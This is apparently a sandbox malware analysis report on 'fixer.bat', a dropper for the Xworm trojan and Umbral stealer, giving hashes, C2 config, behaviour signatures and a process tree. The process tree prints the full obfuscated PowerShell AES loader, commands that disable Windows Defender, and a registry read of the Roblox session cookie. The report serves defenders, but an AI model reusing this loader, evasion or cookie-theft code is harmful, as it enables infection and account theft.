Resubmissions

01-12-2024 17:49

241201-wd91zaskbr 10

01-12-2024 17:46

241201-wcqkyaxmaw 10

01-12-2024 17:37

241201-v7ftjsxlcv 10

Analysis

  • max time kernel
    45s
  • max time network
    80s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    01-12-2024 17:46

General

  • Target

    fixer.bat

  • Size

    259KB

  • MD5

    63f3ebe3fe598479517c1843d1f05944

  • SHA1

    4aaeed78293c47805595957cc3fa71d5fdd07d15

  • SHA256

    48b14d5f105efa0097cc24de8bbf0c334da58906addc06a9a42fe8274d8759e2

  • SHA512

    12d5f9c569812a7cef6838c64414757689ee811aecfbc21465b36c0bcecb755b8d75a5f5663bbc5e7d102532ed64cc788b370a00464869044e8576699d0b1e7b

  • SSDEEP

    6144:SIujxg7ViKrBi4Jya9IlvpPxmbkdtEGQQ9ZGeRFBc81tx4Z:m8VTrBiuEpYI3EQzJRFB5GZ

Malware Config

Extracted

Family

xworm

Version

5.0

C2

cheflilou-43810.portmap.host:43810

Mutex

q2m91QtHDnjEQolK

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLcV5Di0lrYzeB8Z5oXuvc+IYrKKIGk30pV1obfMeT4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8hV4bFs+GCRTAu0FDqlpAg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JhDGU=New-Object System.IO.MemoryStream(,$param_var); $kMVbR=New-Object System.IO.MemoryStream; $mBSnP=New-Object System.IO.Compression.GZipStream($JhDGU, [IO.Compression.CompressionMode]::Decompress); $mBSnP.CopyTo($kMVbR); $mBSnP.Dispose(); $JhDGU.Dispose(); $kMVbR.Dispose(); $kMVbR.ToArray();}function execute_function($param_var,$param2_var){ $fmLYa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hvYPj=$fmLYa.EntryPoint; $hvYPj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$TAymA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\fixer.bat').Split([Environment]::NewLine);foreach ($kvbgu in $TAymA) { if ($kvbgu.StartsWith(':: ')) { $IkiFk=$kvbgu.Substring(3); break; }}$payloads_var=[string[]]$IkiFk.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3608
      • C:\Users\Admin\AppData\Local\Temp\ficybd.exe
        "C:\Users\Admin\AppData\Local\Temp\ficybd.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2320
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ficybd.exe"
          4⤵
          • Views/modifies file attributes
          PID:644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ficybd.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1356
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3684
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3256
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5064
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3972
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2164
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:2640
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          4⤵
          • Detects videocard installed
          • Suspicious behavior: EnumeratesProcesses
          PID:2232
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ficybd.exe" && pause
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1704
          • C:\Windows\system32\PING.EXE
            ping localhost
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4988

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    ad8d5687e7c2fb53a11e30b13b4481d2

    SHA1

    37b8b35e5d41b21d5a6afd343dbcde469571d60a

    SHA256

    c39aa3bb59ecd45342a4f8deeff6910ea66769fb6179562824a7802516fd4f28

    SHA512

    70cc821047b027a53a9567354c03ae058974adb13613dc06127bfef86daed25783182c7e24751483db1f9938de44eccb2c634579457c7f6b2ac403e68ee3004e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    60b3262c3163ee3d466199160b9ed07d

    SHA1

    994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

    SHA256

    e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

    SHA512

    081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    948B

    MD5

    9e84791e002bacedd66f4fb293b6ff63

    SHA1

    0711b437e7f394521c3b0c701e35b761d6b2fa07

    SHA256

    e2a9eccacf36d9db2d21db98b6f48f4eed5913c291a27049e7aa75ff65ad7a84

    SHA512

    5ebf3ce590b3cb5fc7fd53d5af5bb3d84f5910171e61de293c00b1c8d26324d849745fa816c38ee90c30e438c71e8a1d7df6e63438810c8e5ed12b3d112884e1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    8e1fdd1b66d2fee9f6a052524d4ddca5

    SHA1

    0a9d0994559d1be2eecd8b0d6960540ca627bdb6

    SHA256

    4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

    SHA512

    5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhuktmxb.ian.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\ficybd.exe

    Filesize

    227KB

    MD5

    d2d3a70b2bb57de2e98a24e8dac7a79c

    SHA1

    1d527ece8a8a52948928a8b1c15bbe329c16f4db

    SHA256

    7c686dffa28318119a8c0a5fbd17fb828894470f8b61f3d3339393c3f634391a

    SHA512

    de561197eb37385c46a461c04066c45c1b8be2136c16524e04085a8bdf46b1073b20bd86de45cee296619c166cd1acee7921ffe60fa7c9bdd95d9a7a95787687

  • memory/3608-16-0x00000201FECE0000-0x00000201FECEE000-memory.dmp

    Filesize

    56KB

  • memory/3608-15-0x00000201FEC90000-0x00000201FECC2000-memory.dmp

    Filesize

    200KB

  • memory/3608-20-0x00007FFDF6C53000-0x00007FFDF6C55000-memory.dmp

    Filesize

    8KB

  • memory/3608-21-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

  • memory/3608-14-0x00000201FC5C0000-0x00000201FC5C8000-memory.dmp

    Filesize

    32KB

  • memory/3608-0-0x00007FFDF6C53000-0x00007FFDF6C55000-memory.dmp

    Filesize

    8KB

  • memory/3608-13-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

  • memory/3608-12-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

  • memory/3608-11-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

  • memory/3608-6-0x00000201FC560000-0x00000201FC582000-memory.dmp

    Filesize

    136KB

  • memory/4036-36-0x000001E9F6520000-0x000001E9F6560000-memory.dmp

    Filesize

    256KB

  • memory/4036-64-0x000001E9F8A90000-0x000001E9F8AAE000-memory.dmp

    Filesize

    120KB

  • memory/4036-63-0x000001E9F8AE0000-0x000001E9F8B30000-memory.dmp

    Filesize

    320KB

  • memory/4036-62-0x000001E9F8C80000-0x000001E9F8CF6000-memory.dmp

    Filesize

    472KB

  • memory/4036-89-0x000001E9F8AB0000-0x000001E9F8ABA000-memory.dmp

    Filesize

    40KB

  • memory/4036-90-0x000001E9F8E00000-0x000001E9F8E12000-memory.dmp

    Filesize

    72KB

  • memory/4036-37-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

  • memory/4036-110-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB